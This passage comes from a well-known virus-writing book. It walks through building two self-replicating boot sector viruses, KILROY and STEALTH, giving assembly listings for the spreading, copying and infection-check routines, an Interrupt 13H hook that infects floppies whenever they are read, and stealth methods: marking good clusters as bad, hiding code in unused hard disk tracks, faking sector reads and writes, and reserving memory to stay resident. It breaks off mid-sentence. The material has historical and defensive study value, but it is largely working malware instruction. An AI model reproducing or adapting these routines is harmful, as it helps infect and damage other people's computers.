(1) (2) (3)

BIOS Loads

Partition Boot Sector

Partition Boot Sector Loads

DOS Boot Sector

DOS Boot Sector

Loads DOS

7C00

0600

7C00

0700

Figure 14: The hard disk boot sequence in three steps.

Case Number Three: A Simple Boot Sector Virus 71

may only be a dozen free bytes available for ``other code''---and the

layout of the boot sector will vary with different operating systems.

To deal with these variations in such a limited amount of space

would take a miracle program. Instead, we will design a whole,

functional boot sector.

The Necessary Components of a Boot Sector

To write a boot sector that can both boot up the DOS

operating system and reproduce means we are going to have to trim

down on some of what a normal boot sector does. The KILROY

virus won't display the polite little error messages like ``NonSys

tem disk or disk error / Replace and strike any key when ready''

when your disk isn't configured properly. Instead, it will be real

rude to the user if everything isn't just right. That will make room

for the code necessary to carry out covert operations.

To start with, let's take a look at the basic structure of a

boot sector. The first bytes in the sector are always a jump instruc

tion to the real start of the program, followed by a bunch of data

about the disk on which this boot sector resides. In general, this

data changes from disk type to disk type. All 360K disks will have

the same data, but that will differ from 1.2M drives and hard drives,

etc. The standard data for the start of the boot sector is described

in Table 2. It consists of a total of 43 bytes of information. Most of

this information is required in order for DOS and the BIOS to use

the disk drive and it should never be changed inadvertently. The one

exception is the DOS_ID field. This is simply eight bytes to put a

name in to identify the boot sector. We'll put ``Kilroy'' there.

Right after the jump instruction, the boot sector sets up the

stack. Next, it sets up the Disk Parameter Table also known as the

Disk Base Table. This is just a table of parameters which the BIOS

uses to control the disk drive (Table 3) through the disk drive

controller (a chip on the controller card). More information on these

parameters can be found in Peter Norton's Programmer's Guide to

the IBM PC, and similar books. When the boot sector is loaded, the

BIOS has already set up a default table, and put a pointer to it at

the address 0000:0078H (interrupt 1E Hex). The boot sector re

72 The Little Black Book of Computer Viruses

Name Position Size Description

DOS_ID 7C03 8 Bytes ID of Format program

SEC_SIZE 7C0B 2 Sector size, in bytes

SECS_PER_CLUST 7C0D 1 Number of sectors per cluster

FAT_START 7C0E 2 Starting sector for the 1st FAT

FAT_COUNT 7C10 1 Number of FATs on the disk

ROOT_ENTRIES 7C11 2 Number of entries in root directory

SEC_COUNT 7C13 2 Number of sectors on this disk

DISK_ID 7C14 1 Disk ID (FD Hex = 360K, etc.)

SECS_PER_FAT 7C15 2 Number of sectors in a FAT table

SECS_PER_TRK 7C18 2 Number of sectors on a track

HEADS 7C1A 2 Number of heads (sides) on disk

HIDDEN_SECS 7C1C 2 Number of hidden sectors

Table 2: The Boot Sector data.

Offset Description

0 Specify Byte 1: head unload time, step rate time

1 Specify Byte 2: head load time, DMA mode

2 Time before turning motor off, in clock ticks

3 Bytes per sector (0=128, 1=256, 2=512, 3=1024)

4 Last sector number on a track

5 Gap length between sectors for read/write

6 Data transfer length (set to FF Hex)

7 Gap length between sectors for formatting

8 Value stored in each byte when a track is formatted

9 Head settle time, in milliseconds

A Motor startup time, in 1/8 second units

Table 3: The Disk Parameter Table.

Case Number Three: A Simple Boot Sector Virus 73

places this table with its own, tailored for the particular disk. This

is standard practice, although in many cases the BIOS table is

perfectly adequate to access the disk.

Rather than simply changing the address of the interrupt

1EH vector, the boot sector goes through a more complex procedure

that allows the table to be built both from the data in the boot sector

and the data set up by the BIOS. It does this by locating the BIOS

default table and reading it byte by byte, along with a table stored

in the boot sector. If the boot sector's table contains a zero in any

given byte, that byte is replaced with the corresponding byte from

the BIOS'table, otherwise the byte is left alone. Once the new table

is built inside the boot sector, the boot sector changes interrupt

vector 1EH to point to it. Then it resets the disk drive through BIOS

interrupt 13H, function 0, using the new parameter table.

The next step, locating the system files, is done by finding

the start of the root directory on disk and looking at it. The disk data

at the start of the boot sector has all the information we need to

calculate where the root directory starts. Specifically,

FRDS (First root directory sector) = FAT_COUNT*SECS_PER_FAT

+ HIDDEN_SECS + FAT_START

so we can calculate the sector number and read it into memory at

0000:0500H. From there, the boot sector looks at the first two

directory entries on disk. These are just 32 byte records, the first

eleven bytes of which is the file name. One can easily compare these

eleven bytes with file names stored in the boot record. Typical code

for this whole operation looks like this:

LOOK_SYS:

MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk

XOR AH,AH

MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat

ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors

ADD AX,WORD PTR [FAT_START] ;add starting fat sector

PUSH AX

MOV WORD PTR [DOS_ID],AX ;root dir, save it

MOV AX,20H ;dir entry size

MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax

MOV BX,WORD PTR [SEC_SIZE] ;sector size

ADD AX,BX ;add one sector

DEC AX ;decrement by 1

DIV BX ;ax=# sectors in root dir

ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data

MOV BX,OFFSET DISK_BUF ;set up disk read buffer @ 0:0500

POP AX ;and go convert sequential

CALL CONVERT ;sector number to bios data

74 The Little Black Book of Computer Viruses

MOV AL,1 ;prepare for a 1 sector disk read

CALL READ_DISK ;go read it

MOV DI,BX ;compare first file on disk with

MOV CX,11 ;required file name

MOV SI,OFFSET SYSFILE_1 ;of first system file for PC DOS

REPZ CMPSB

JZ SYSTEM_THERE ;ok, found it, go load it

MOV DI,BX ;compare first file with

MOV CX,11 ;required file name

MOV SI,OFFSET SYSFILE_2 ;of first system file for MS DOS

REPZ CMPSB

ERROR2:

JNZ ERROR2 ;not the same an error, so stop

Once the boot sector has verified that the system files are

on disk, it tries to load the first file. It assumes that the first file is

located at the very start of the data area on disk, in one contiguous

block. So to load it, the boot sector calculates where the start of the

data area is,

FDS (First Data Sector) = FRDS

+ [(32*ROOT_ENTRIES) + SEC_SIZE 1]/SEC_SIZE

and the size of the file in sectors. The file size in bytes is stored at

the offset 1CH from the start of the directory entry at 0000:0500H.

The number of sectors to load is at most

SIZE IN SECTORS = (SIZE_IN_BYTES/SEC_SIZE) + 1

(Note that the size of this file is always less than 29K or it cannot

be loaded.) The file is loaded at 0000:0700H. Then the boot sector

sets up some parameters for that system file in its registers, and

Position Size Description

00 Hex 8 Bytes File Name (ASCII, space filled)

08 3 File Name Extension (ASCII, space filled)

0B 1 File Attribute

0C 10 Reserved, Zero filled

16 2 Time file last written to

18 2 Date file last written to

1A 2 Starting FAT entry

1C 4 File size(long integer)

Table 4: The format of a directory entry on disk.

Case Number Three: A Simple Boot Sector Virus 75

transfers control to it. From there the operating system takes over

the computer, and eventually the boot sector's image in memory is

overwritten by other programs.

Gutting Out the Boot Sector

The first step in creating a one sector virus is to write some

code to perform all of the basic boot sector functions which is as

codeefficient as possible. All of the functionality discussed above

is needed, but it's not what we're really interested in. So we will

strip out all the fancy bells and whistles that are typically included

in a boot sector. First, we want to do an absolute minimum of error

handling. The usual boot sector displays several error messages to

help the user to try to remedy a failure. Our boot sector virus won't

be polite. It doesn't really care what the user does when the boot

up fails, so if something goes wrong, it will just stop. Whoever is

using the computer will get the idea that something is wrong and

try a different disk anyhow. This rudeness eliminates the need for

error message strings, and the code required to display them. That

can save up to a hundred bytes.

The second point of rudeness we will incorporate into our

boot sector virus is that it will only check the disk for the first system

file and load it. Rarely is one system file present and not the other,

since both DOS commands that put them on a disk (FORMAT and

SYS) put them there together. If for some reason the second file

does not exist, our boot sector will load and execute the first one,

rather than displaying an error message. The first system program

will just bomb then when it goes to look for the second file and it's

not there. The result is practically the same. Trimming the boot

sector in this fashion makes it necessary to search for only two files

instead of four, and saves about 60 bytes.

Two files instead of four? Didn't I just say that the boot

sector only looks for the two system files to begin with? True, most

boot sectors do, but a viral boot sector must be different. The usual

boot sector is really part of an operating system, but the viral boot

sector is not. It will typically jump from disk to disk, and it will not

know what operating system is on that disk. (And there's not

76 The Little Black Book of Computer Viruses

enough room in one sector to put in code that could figure it out

and make an intelligent choice.) So our solution will be to assume

that the operating system could be either MSDOS or PCDOS and

nothing else. That means we must look for system files for both

MSDOS or PCDOS, four files. Limiting the search to the first

system file means that we only have to find IO.SYS or

IBMBIO.COM.

Anyhow, incorporating all of these shortcuts into a boot

sector results in 339 bytes of code, which leaves 173 bytes for the

search and copy routines. That is more than enough room. The

listing for this basic (nonviral) boot sector, BOOT.ASM, is pre

sented in Appendix C.

The Search and Copy Mechanism

Ok, let's breathe some life into this boot sector. Doing that

is easy because the boot sector is such a simple animal. Since code

size is a primary concern, the search and copy routines are com

bined in KILROY to save space.

First, the copy mechanism must determine where it came

from. The third to the last byte in the boot sector will be set up by

the virus with that information. If the boot sector came from drive

A, that byte will be zero; if it came from drive C, that byte will be

80H. It cannot come from any other drive since a PC boots only

from drive A or C.

Once KILROY knows where it is located, it can decide

where to look for other boot sectors to infect. Namely, if it is from

drive A, it can look for drive C (the hard disk) and infect it. If there

is no drive C, it can look for a second floppy drive, B:, to infect.

(There is never any point in trying to infect A. If the drive door on

A: were closed, so it could be infected, then the BIOS would have

loaded the boot sector from there instead of C:, so drive A would

already be infected.)

One complication in infecting a hard drive is that the virus

cannot tell where the DOS boot sector is located without loading

the partition boot sector (at Track 0, Head 0, Sector 1) and reading

the information in it. There is not room to do that in such a simple

Case Number Three: A Simple Boot Sector Virus 77

virus, so we just guess instead. We guess that the DOS boot sector

is located at Track 0, Head 1, Sector 1, which will normally be the

first sector in the first partition. We can check the last two bytes in

that sector to make sure they are 55H AAH. If they are, chances are

good that we have found the DOS boot sector. In the relatively rare

cases when those bytes belong to some other boot sector, for a

different operating system, tough luck. The virus will crash the disk.

If the ID bytes 55H AAH are not found in an infection attempt, the

virus will be polite and forget about trying to infect the hard drive.

It will go for the second floppy instead.

Once a disk has been found to infect, the copy mechanism

is trivial. All one need do is:

1) Read the boot sector from the disk to infect into a data

area.

2) Copy the viral boot sector into this data area, except

the disk data at the start of the sector, which is depend

ent on the drive.

3) Write the infected sector back out to the disk which is

being infected.

That's it. The code for the search/copy mechanism looks like this:

SPREAD:

MOV BX,OFFSET DISK_BUF ;read other boot sectors to here

CMP BYTE PTR [DRIVE],80H

JZ SPREAD2 ;if it's C, go try to spread to B

MOV DX,180H ;if it's A, try to spread to C

CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive

JZ SPREAD2 ;none try floppy B

MOV CX,1 ;read Track 0, Sector 1

MOV AX,201H

INT 13H

JC SPREAD2 ;on error, go try drive B

CMP WORD PTR [NEW_ID],0AA55H ;make sure it's really a boot sec

JNZ SPREAD2

CALL MOVE_DATA

MOV DX,180H ;and go write the new sector

MOV CX,1

MOV AX,301H

INT 13H

JC SPREAD2 ;error writing to C:, try B:

JMP SHORT LOOK_SYS ;no error, look for system files

SPREAD2:

MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B drive

AND AL,0C0H

ROL AL,1 ;put bits 6 & 7 into bits 0 & 1

ROL AL,1

INC AL ;add one, so now AL=# of drives

CMP AL,2

JC LOOK_SYS ;no B drive, just quit

78 The Little Black Book of Computer Viruses

MOV DX,1 ;read drive B

MOV AX,201H ;read one sector

MOV CX,1 ;read Track 0, Sector 1

INT 13H

JC LOOK_SYS ;if an error here, just exit

CMP WORD PTR [NEW_ID],0AA55H ;make sure it's really a boot sec

JNZ LOOK_SYS ;no, don't attempt reproduction

CALL MOVE_DATA ;yes, move this boot sec in place

MOV DX,1

MOV AX,301H ;and write this boot sector to B:

MOV CX,1

INT 13H

MOVE_DATA:

MOV SI,OFFSET DSKBASETBL ;move all of the boot sector code

MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL OFFSET BOOTSEC)

MOV CX,OFFSET DRIVE OFFSET DSKBASETBL

REP MOVSB

MOV SI,OFFSET BOOTSEC ;move initial jmp and the sec ID

MOV DI,OFFSET DISK_BUF

MOV CX,11

REP MOVSB

RET

We place this code in the boot sector after the Disk Parameter Table

has been set up, and before the system files are located and loaded.

Taming the Virus

The KILROY virus is very subtle. The average user may

never see a clue that it is there. Since there is enough room left, let

us be kind, and put in some code to display the message ``Kilroy

was here!'' at boot time. Since DOS hasn't been loaded yet, we can't

use DOS to display that message. Instead we use BIOS Interrupt

10H, Function 0EH, and apply it repeatedly, as follows:

DISP_MSG:

MOV SI,OFFSET MESSAGE ;set offset of message up

DM1:

MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH

LODSB ;get character to display

OR AL,AL

JZ DM2 ;repeat until 0

INT 10H ;display it

JMP SHORT DM1 ;and get another

DM2: RET

MESSAGE: DB 'Kilroy was here!',0DH,0AH,0AH,0

There. That will tame the virus a bit. Besides displaying a

message, the virus can be noticed as it searches for drives to infect,

especially if you have a second floppy. If your hard disk is infected,

or if you have no hard disk, you will notice that the second floppy

lights up for a second or two before your machine boots up. It didn't

Case Number Three: A Simple Boot Sector Virus 79

used to do that. This is the virus going out to look for a disk in that

drive to infect. If there is no disk in the drive, the Interrupt 13H call

will return an error and the boot sector will load the operating

system and function normally.

This is a pretty rudimentary virus. It can make mistakes

when infecting the hard drive and miss the boot sector. It can only

replicate when the machine boots up. And it can get stuck in places

where it cannot replicate any further (for example, on a system with

only one floppy disk and a hard disk). Still, it will do it's job, and

travel all around the world if you're not careful with it.

80 The Little Black Book of Computer Viruses

Case Number Four:

A Sophisticated Boot Sector Virus

With the basics of boot sectors behind us, let's explore a

sophisticated boot sector virus that will overcome the rather glaring

limitations of the KILROY virus. Specifically, let's look at a virus

which will carefully hide itself on both floppy disks and hard disks,

and will infect new disks very efficiently, rather than just at boot

time.

Such a virus will require more than one sector of code, so

we will be faced with hiding multiple sectors on disk and loading

them at boot time. To do this in such a way that no other data on a

disk is destroyed, while keeping those sectors of virus code well

hidden, will require some little known tricks. Additionally, if the

virus is to infect other disks after bootup, it must leave at least a

portion of itself memoryresident. The mechanism for making the

virus memory resident cannot take advantage of the DOS Keep

function (Function 31H) like typical TSR programs. The virus must

go resident before DOS is even loaded, and it must fool DOS so

DOS doesn't just write over the virus code when it does get loaded.

This requires some more tricks, the exploration of which will be

the subject of this chapter.

Basic Structure of the Virus

Our new boot sector virus, named STEALTH, will have

three parts. First, there is a new boot sector, called the viral boot

sector. This is the sector of code that will replace the original boot

sector at Track 0, Head 0, Sector 1. Secondly, there is the main body

of the virus, which consists of several sectors of code that will be

hidden on the disk. Thirdly, there is the old boot sector, which will

be incorporated into the virus.

When the viral boot sector is loaded and executed at

startup, it will go out to disk and load the main body of the virus

and the old boot sector. The main body of the virus will execute,

possibly infecting the hard disk, and installing itself in memory (as

we will discuss in a moment) so it can infect other disks later. Then

it will copy the original boot sector over the viral boot sector at

0000:7C00H, and execute it. The last step allows the disk to boot

up in a normal fashion without having to bother writing code for

startup. That's important, because STEALTH will infect the parti

tion boot sector on hard drives. The code in that sector is completely

different from DOS's boot sector. Since STEALTH saves the

original boot sector, it will not have to go around carrying two boot

sectors with it, one for floppies and one for hard disks. Instead, it

simply gobbles up the code that's already there and turns it to its

own purposes. This strategy provides the added benefit that the

STEALTH virus will be completely operating system independent.

The Copy Mechanism

The biggest part of designing the copy mechanism is

deciding how to hide the virus on disk, so it does not interfere with

the normal operation of the computer (unless it wants to).

Before you hide anything, you'd better know how big it is.

It's one matter to hide a key to the house, and quite another to hide

the house itself. So before we start deciding how to hide STEALTH,

it is important to know about how big it will be. Based on the size

82 The Little Black Book of Computer Viruses

of the INTRUDER virus in Chapter 4, we might imagine

STEALTH will require five or ten sectors. With a little hindsight,

it turns out that six will be sufficient. So we need a method of

quickly and effectively hiding 6 sectors on each of the various types

of floppy disks, and on hard disks of all possible types.

It would be wonderful if we could make the virus code

totally invisible to every user. Of course, that isn't possible, al

though we can come very close. One tricky way of doing it is to

store the data on disk in an area that is completely outside of

anything that DOS (or other operating systems) can understand. For

floppy disks, this would mean inventing a nonstandard disk format

that could contain the DOS format, and also provide some extra

room to hide the virus code in. DOS could use the standard parts

of the disk the way it always does, and the nonstandard parts will

be invisible to it. Unless someone writes a special program that a)

performs direct calls to the BIOS disk functions and b) knows

exactly where to look, the virus code will be hidden on the disk.

This approach, although problematic for floppies, will prove useful

for hiding the virus on the hard disk.

In the case of floppies, an alternative is to tell DOS to

reserve a certain area of the disk and stay away from it. Then the

virus can put itself in that area and be sure that DOS will not see it

or overwrite it. This can be accomplished by manipulating the File

Attribute Table. This method was originally employed by the

Pakistani Brain virus, which was written circa 1986. Our

STEALTH virus will use a variant of this method here to handle

360 kilobyte and 1.2 megabyte disk formats for 5 1/4" diskettes,

and 720 kilobyte and 1.44 megabyte 3 1/2" diskette formats.

Let's examine the 3 1/2" 720 kilobyte diskette format in

detail to see how STEALTH approaches hiding itself. This kind of

diskette has 80 tracks, two sides, and nine sectors per track. The

virus will hide the body of its code in Track 79, Side 1, Sectors 4

through 9. Those are the last six sectors on the disk, and conse

quently, the sectors least likely to contain data. STEALTH puts the

main body of its code in sectors 4 through 8, and hides the original

boot sector in sector 9. However, since DOS normally uses those

sectors, the virus will be overwritten unless it has a way of telling

Case Number Four: A Sophisticated Boot Sector Virus 83

DOS to stay out. Fortunately, that can be done by modifying the

FAT table to tell DOS that those sectors on the disk are bad.

DOS organizes a diskette into clusters, which consist of

one or more contiguous sectors. Each cluster will have an entry

corresponding to it in the FAT table, which tells DOS how that

cluster is being used. The FAT table consists of an array of 12 bit

entries, with as many entries as there are clusters on the diskette. If

a cluster is empty, the corresponding FAT entry is 0. If it is in the

middle of a file, the FAT entry is a pointer to the next cluster in the

file; if it is at the end of a file, the FAT entry is FF8 through FFF. A

cluster may be marked as bad (to signal DOS that it could not be

formatted properly) by placing an FF7 Hex in its FAT entry.

When DOS sees an FF7 in a FAT entry, it does not use the

sectors in that cluster for data storage. DOS itself never checks

those clusters to see if they are bad, once they are marked bad. Only

the FORMAT program marks clusters bad when it is in the process

of formatting a disk. From there on out, they are never touched by

DOS. Thus a virus can mark some clusters bad, even though they're

really perfectly fine, and then go hide there, assured that DOS will

leave it alone. On a 720 kilobyte diskette, there are two sectors in

each cluster. Thus, by marking the last three clusters on the disk as

bad in the two FAT tables, the virus can preserve six sectors at the

end of the diskette.

In the event that the diskette is full of data, the virus should

ideally be polite, and avoid overwriting anything stored in the last

clusters. This is easily accomplished by checking the FAT first, to

see if anything is there before infecting the disk. Likewise, if for

some reason one of those sectors is really bad, the virus should stop

its attempt to copy itself to the diskette gracefully. If it does not, the

diskette could end up being a useless mess (especially if it is a boot

disk) and it wouldn't even contain a working copy of the virus. If

there is a problem at any stage of the infection process, the virus

will simply abort, and no permanent damage will be done to the

disk.

On the other hand, we could design the virus to be more

agressive. It might be somewhat more successful (from a neodar

winian point of view) if it infects the diskette even when the disk

is full, and it will have to overwrite a file to infect the disk

84 The Little Black Book of Computer Viruses

successfully. While we do not implement such an approach here, it

would actually be easier than being polite.

Similar strategies are employed to infect 360 kilobyte and

1.2 megabyte 5 1/4" diskettes, and 1.44 megabyte 3 1/2" diskettes,

as explained in detail in the code in Appendix E. There do exist

other diskette formats, such as 320 kilobyte 5 1/4", which the virus

will simply stay away from. If STEALTH encounters anything

nonstandard, it just won't infect the diskette. It will have plenty of

formats that it can infect, and obsolete or nonstandard formats are

relatively rare. Failing to infect the oneinathousand odd ball is

no great loss, and it saves a lot of code. As an exercise, you may

want to modify the virus so it can infect some different formats.

Hiding data on a hard drive is a different matter. There are

so many different drives on the market that it would be a major

effort for STEALTH to adapt to each disk drive separately. Fortu

nately, hard drives are not set up to be 100% occupied by DOS.

There are nonDOS areas on every disk. In particular, the first boot

sector, which contains the partition table, is not a part of DOS.

Instead, DOS has a partition assigned to it, for its own use. Any

other area on disk does not belong to DOS.

As it turns out, finding a single area on any hard disk that

does not belong to DOS, is not too difficult. If you take the DOS

program FDISK and play with it a little, creating partitions on a

hard drive, you'll soon discover something very interesting: Al

though the first boot sector is located at Track 0, Head 0, Sector 1,

FDISK (for all the versions I've tested) does not place the start of

the first partition at Track 0, Head 0, Sector 2. Instead, it always

starts at Track 0, Head 1, Sector 1. That means that all of Track 0,

Head 0 (except the first sector) is free space. Even the smallest ten

megabyte disk has 17 sectors per track for each head. That is plenty

of room to hide the virus in. So in one fell swoop, we have a strategy

to place the virus on any hard disk. (By the way, it's only fair to

mention that some low level hard disk formatting programs do use

those sectors to store information in. However, letting the virus

overwrite them does not hurt anything at all.)

Once a strategy for hiding the virus has been developed,

the copy mechanism follows quite naturally. To infect a disk, the

virus must:

Case Number Four: A Sophisticated Boot Sector Virus 85

1) Determine which type of disk it is going to infect, a

hard disk or one of the four floppy disk types.

2) Determine whether that disk is already infected, or if

there is no room for the virus. If so, the copy mecha

nism should not attempt to infect the disk.

3) Update the FAT tables (for floppies) to indicate that

the sectors where the virus is hidden are bad sectors.

4) Move all the virus code to the hidden area on disk.

5) Read the original boot sector from the disk and write

it back out to the hidden area in the sector just after

the virus code.

6) Take the disk parameter data from the original boot

sector (and the partition information for hard disks)

and copy it into the viral boot sector. Write this new

boot sector to disk as the boot sector at Track 0, Head

0, Sector 1.

In the code for STEALTH, the copy mechanism is broken

up into several parts. The two main parts are routines named

INFECT_HARD, wh i ch i n fec t s t he ha rd d i sk , and IN

FECT_FLOPPY, which infects all types of floppy drives. The

INFECT_FLOPPY routine first determines which type of floppy

drive it is dealing with by reading the boot sector and looking at the

number of sectors on the drive (the variable SEC_COUNT in Table

2). If it finds a match, it calls one of the routines INFECT_360,

INFECT_720, INFECT_12M or INFECT_144M, which goes

through the details of infecting one of the particular diskette types.

All of these routines are listed in Appendix E.

The Search Mechanism

Searching for uninfected disks is not very difficult. We

could put an ID byte in the viral boot sector so when the virus reads

the boot sector on a disk and finds the ID, it knows the disk is

infected. Otherwise it can infect the disk. The STEALTH virus uses

its own code as an ID. It reads the boot sector and compares the

86 The Little Black Book of Computer Viruses

first 30 bytes of code (starting after the boot sector data area) with

the viral boot sector. If they don't match, the disk is ripe for

infection.

The code for a compare like this is incorporated into the

routine IS_VBS:

IS_VBS:

push si ;save these

push di

cld

mov di,OFFSET BOOT ;set up for a compare

mov si,OFFSET SCRATCHBUF+(OFFSET BOOTOFFSET BOOT_START)

mov cx,15

repz cmpsw ;compare 30 bytes

pop di ;restore these

pop si

ret ;return with z properly set

which returns a z flag if the disk is infected, and nz if it is not. BOOT

is the label for the start of the code in the boot sector.

BOOT_START is the beginning of the boot sector at 7C00H.

IS_VBS is called only after a boot sector is read from the disk by

the GET_BOOT_SEC routine into the scratch data area

SCRATCHBUF. The code to read the boot sector is:

GET_BOOT_SEC:

push ax

mov bx,OFFSET SCRATCHBUF ;buffer for boot sec

mov dl,al ;drive to read from

mov dh,0 ;head 0

mov ch,0 ;track 0

mov cl,1 ;sector 1

mov al,1 ;read 1 sector

mov ah,2 ;BIOS read function

int 13H ;go do it

pop ax

ret

which reads the boot sector from the drive specified in al.

So far, fairly easy. However, the more serious question in

designing a search mechanism is when to search for a disk to infect.

Infecting floppy disks and hard disks are entirely different matters.

A user with a hard disk on his machine will rarely, if ever, boot from

a floppy. Often, booting from a floppy will be an accident. For

example a user might leave a diskette in drive Awhen he goes home

from work, and then comes in the next morning and turn his

Case Number Four: A Sophisticated Boot Sector Virus 87

machine on. Normally such a disk will not be a boot disk with DOS

on it, and it will cause an error. The user will see the error and take

it out to boot from the hard drive as usual. However, the boot sector

on the floppy disk was loaded and executed. The infection mecha

nism for moving from a floppy disk to a hard disk must take

advantage of this little mistake on the user's part to be truly

effective. Thatmeanshard drives should be infected at boot time.

Then if a user leaves an infected diskette in drive A and turns on

his machine, his hard drive is infected immediately. No other

operation is necessary.

On the other hand, once a hard disk has the virus on it, it

may come into contact with dozens or even hundreds of floppy

diskettes during one day. In order to infect them, the virus must be

present in memory when the diskettes are in the floppy drive. That

means when the virus is loaded from a hard drive, it must become

memoryresident and stay there. Then, it must activate whenever

some appropriate action is performed on the floppy diskette by

other programs. In this way, the computer becomes an engine for

producing infected floppy disks.

So what action on the floppy drive should trigger the

infection sequence? It should certainly be something that happens

frequently, yet at the same time it should require a bare minimum

of extra disk activity. Both search and infection should happen

simultaneously, since floppy disks can easily be removed and

inserted. If they were not simultaneous, the search could indicate

an uninfected diskette on drive A. Then the infection routine could

attempt to infect an already infected disk if the user were given time

to change disks before the infection routine got around to doing its

job.

An ideal time to check the floppy disk for the virus is when

a particular sector is read from the disk. That can be a frequent or

rare occurrence, depending on which sector we choose as a trigger.

A sector near the end of the disk might be read only rarely, since

the disk will rarely be full. At the other extreme, if it were to trigger

when the boot sector itself is read, the disk would be infected

immediately, since the boot sector on a newly inserted floppy drive

is read before anything else is done. The STEALTH virus takes the

most agressive approach possible. It will go into the infection

88 The Little Black Book of Computer Viruses

sequence any time that the boot sector is read. That means that when

the virus is active, any time you so much as insert a floppy disk into

the drive, and do a directory listing (or any other operation that reads

the disk), it will immediately become infected. The virus must

churn out a lot of floppies in order for a few to get booted from.

To implement this search mechanism, the STEALTH virus

must intercept Interrupt 13H, the BIOS disk service, at boot time,

and then monitor it for attempts to access the boot sector. When

such an attempt is made, the virus will carefully lay it aside for a

bit while it loads the boot sector from that diskette for its own use,

checks it with IS_VBS, and possibly infects the diskette. After the

virus is finished with its business, it will resume the attempt to read

the disk and allow the program that wanted to access the boot sector

to continue its operation unhindered.

BIOS Read Sector

Request Intercepted

Head 0?

Track 0?

Hard Disk?

Sector 1?

Read Boot

Sector

Pass control to

ROM BIOS

Is Disk

Infected?

Infect

Disk

Y

Y

N

Y

N

Y

N

Y

N

N

Figure 15: Infect Logic

Case Number Four: A Sophisticated Boot Sector Virus 89

Code for this type of an interrupt trap looks like this:

INT_13H:

sti ;interrupts on

cmp ah,2 ;we want to intercept reads

jnz I13R ;pass anything else to BIOS

cmp dh,0 ;is it head 0?

jnz I13R ;nope, let BIOS handle it

cmp ch,0 ;is it track 0?

jnz I13R ;nope, let BIOS handle it

RF0: cmp dl,80H ;is it the hard disk?

jnc I13R ;yes, let BIOS handle read

cmp cl,1 ;no, floppy, is it sector 1?

jnz I13R ;no, let BIOS handle it

call CHECK_DISK ;is floppy already infected?

jz I13R ;yes so let BIOS handle it

call INFECT_FLOPPY ;else go infect the diskette

;and then let BIOS go

;do the original read

I13R: jmp DWORD PTR cs:[OLD_13H] ;BIOS Int handler

where OLD_13H is the data location where the original Interrupt

13H vector is stored before it is replaced with a vector to INT_13H.

CHECK_DISK simply calls GET_BOOT_SEC and IS_VBS after

saving all the registers (to pass them to the BIOS later to do the

originally requested read).

The AntiDetection Mechanism

TheSTEALTH virus uses some more advanced antidetec

tion logic than previous viruses we've studied. They are aimed not

only at avoiding detection by the average user, who doesn't know

computers that well, but also at avoiding detection by a user armed

with sophisticated software tools, including programs designed

specifically to look for viruses.

The main part of the STEALTH virus is already hidden on

disk in areas which the operating system thinks are unusable. On

floppy disks, only the viral boot sector is not hidden. On hard drives,

the whole virus is exposed in a way, since it is sitting on Track 0,

Head 0. However, none of those sectors are accessed by programs

or the operating system, although the FDISK program rewrites the

partition boot sector.

90 The Little Black Book of Computer Viruses

Since the virus is already intercepting Interrupt 13H to

infect disks, it is not too difficult to add a little functionality to the

viral interrupt handler to hide certain sectors from prying eyes. For

example, consider an attempt to read the boot sector on a 1.2

megabyte diskette: STEALTH traps the request to read. Instead of

just blindly servicing it, the virus first reads the boot sector into its

own buffer. There, it checks to see if this sector is the viral boot

sector. If not, it allows the caller to read the real boot sector. On the

other hand, if the real boot sector belongs to STEALTH, it will read

the old boot sector from Track 79, Head 1, Sector 15, and pass that

to the caller instead of the viral boot sector. In this way, the viral

boot sector will be invisible to any program that uses either DOS

or BIOS to read the disk (and the exceptions to that are pretty rare),

provided the virus is in memory. In the same way, the BIOS write

BIOS Read Sector

Request Intercepted

Head 0?

Track 0?

Y

Sector 0?

N

Read Boot Sec

Is Disk

Infected?

N

Y

N

N

Y

Pass Control

to ROM BIOS

Hard Disk?

Move dummy

data to es:bx

Infect Disk

Sec 27?

Y

N

Y

N

Read Old Boot Sector from

Hidden Area on disk

Move Old Boot Sector to

es:bx specified by caller

Y

Return to

calling routine

Figure 16: Viral Read Logic.

Case Number Four: A Sophisticated Boot Sector Virus 91

function can be redirected to keep away from the viral boot sector,

redirecting any attempts to write there to the old sector.

In addition to hiding the boot sector, one can hide the rest

of the virus from any attempts to access it through Interrupt 13H.

On hard drives, STEALTH does not allow one to read or write to

sectors 2 through 7 on Track 0, Head 0, because the virus code is

stored there. It fools the program making a read attempt by return

ing a data block of zeros, It fools the program trying to write those

sectors by returning as if it had written them, when in fact the

writing was bypassed.

Additionally, any attempt to read or write to sectors on the

floppy drive could be trapped and returned with an error (carry flag

c set). That is what one would expect, if the clusters marked as bad

in the FAT really were bad. STEALTH does not go that far though,

since DOS protects those sectors pretty well already. Youmaywant

to try to incorporate that extension in as an exercise, though.

With these antidetection procedures in place, the main

body of the virus is well hidden, and when any program looks at

the boot sector, it sees the old boot sector. The only ways to detect

the virus on a disk are (a) to write a program to access the disk with

the hardware directly, or (b) to boot from an uninfected disk and

examine the boot sector of the potentially infected disk. Of course,

the virus is not very well hidden in memory.

Installing the Virus in Memory

Before the virus passes control to the original boot sector,

which will load DOS, it must set itself up in memory somewhere

where it won't get touched. To do this outside of the control of DOS

is a bit tricky. The basic idea involved here is that DOS uses a

number stored at 0040:0013 Hex, which contains the size of avail

able memory in kilobytes. This number is set up by the BIOS before

it reads the boot sector. It may have a value ranging up to 640 =

280H. When the BIOS sets this parameter up, it looks to see how

much memory is actually installed in the computer, and reports it

here. However, something could come along before DOS loads and

change this number to a smaller value. In such a situation, DOS

92 The Little Black Book of Computer Viruses

will not use all the memory that is available in the system, but only

what it's told to use by this memory size variable. Memory above

that point will be reserved, and DOS won't touch it.

The strategy for loading STEALTH into memory is to put

it in the highest physical memory available, determined by the

memory size, as the BIOS has set it. Then STEALTH subtracts a

sufficient number of kilobytes from the memory size variable to

protect itself. In this way, that memorywill be kept away from DOS,

and used by STEALTH when Interrupt 13H is called.

The two responsibilities of the viral boot sector are to load

the main body of the virus into memory, and then to load and

execute the original boot sector. When the BIOS loads the viral boot

